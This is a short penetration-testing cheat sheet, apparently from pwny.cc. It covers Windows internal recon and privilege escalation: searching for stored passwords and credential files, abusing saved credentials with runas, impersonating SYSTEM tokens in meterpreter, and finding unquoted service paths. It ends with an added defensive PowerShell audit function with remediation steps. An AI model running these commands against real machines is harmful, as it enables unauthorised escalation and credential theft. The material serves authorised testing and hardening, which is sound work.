pwny.cc

Internal Recon

General

System info

systeminfo
hostname
whoami /all

Users/localgroups on the machine

net users
net localgroup
net localgroup Administrators
net user hax0r

#Check local and domain
net user hax0r /domain
net group Administrators /domain

Network information/connections

ipconfig /all
route print
arp -a
netstat -ano

Search tips

#FindStr - recursive, case-insensitive string scan with line numbers
findstr /spin "password" *.*

#Dir - list writeable (non read-only) directories
dir /a-r-d /s /b
#Dir - search for secret.txt recursively from the current folder
dir secret.txt /s /p
#Dir - search for files whose names contain certain words
dir /s *pass* == *cred* == *vnc* == *.config*

Privilege Escalation

Stored Credential

#Check if any credentials are stored
cmdkey /list
#Use a stored credential
runas /user:administrator /savecred "cmd.exe /k whoami"

Impersonating Tokens with meterpreter

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

Unquoted Path

#Obtain the path of the executable called by a Windows service
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

#Default search (excludes binaries under C:\Windows and paths that are already quoted)
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
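The wmic one-liner above depends on a tool that is deprecated on current Windows builds. The following PowerShell function is an added example (not part of the pwny.cc page) that performs the same audit through CIM: it reports auto-start services whose ImagePath is unquoted and contains a space outside the Windows directory, together with the intermediate directories whose ACLs an administrator should review before quoting the path. The function name and output fields are this example's own choices.

```powershell
# Added example, not from pwny.cc. Audit services for unquoted executable paths
# containing spaces, the condition the cheat-sheet one-liners search for.
# Remediation for each hit:
#   sc.exe config <ServiceName> binPath= "\"C:\full path\to\service.exe\" <args>"
# and make sure the listed directories are not writable by non-administrators.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }

        # A leading quote means the executable portion is already delimited.
        if ($path.TrimStart().StartsWith('"')) { return }

        # Keep only the executable part (up to and including .exe); arguments
        # after it do not affect how the service control manager resolves the binary.
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path.Trim() }

        # Only paths with a space are ambiguous.
        if ($exe -notmatch ' ') { return }

        # Same exclusion the wmic line applies: binaries under the Windows directory.
        if ($exe -like "$env:SystemRoot\*") { return }

        # Each space creates an alternative lookup location; the parent directory
        # of each one is what must be checked for write access by standard users.
        $parts = $exe -split ' '
        $dirs = for ($i = 1; $i -lt $parts.Count; $i++) {
            Split-Path -Path (($parts[0..($i - 1)] -join ' ') + '.exe') -Parent
        }

        [pscustomobject]@{
            Name               = $_.Name
            StartMode          = $_.StartMode
            State              = $_.State
            Path               = $path
            DirectoriesToCheck = ($dirs | Sort-Object -Unique) -join '; '
        }
    }
}

# Usage: list findings, auto-start services first.
Get-UnquotedServicePath | Sort-Object StartMode | Format-Table -AutoSize -Wrap
```

The `DirectoriesToCheck` column is the part worth acting on: run `Get-Acl` (or `icacls`) against each directory and remove write/modify rights for Users and Authenticated Users where present, then quote the binPath so the ambiguity disappears entirely.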

Last updated 3 years ago
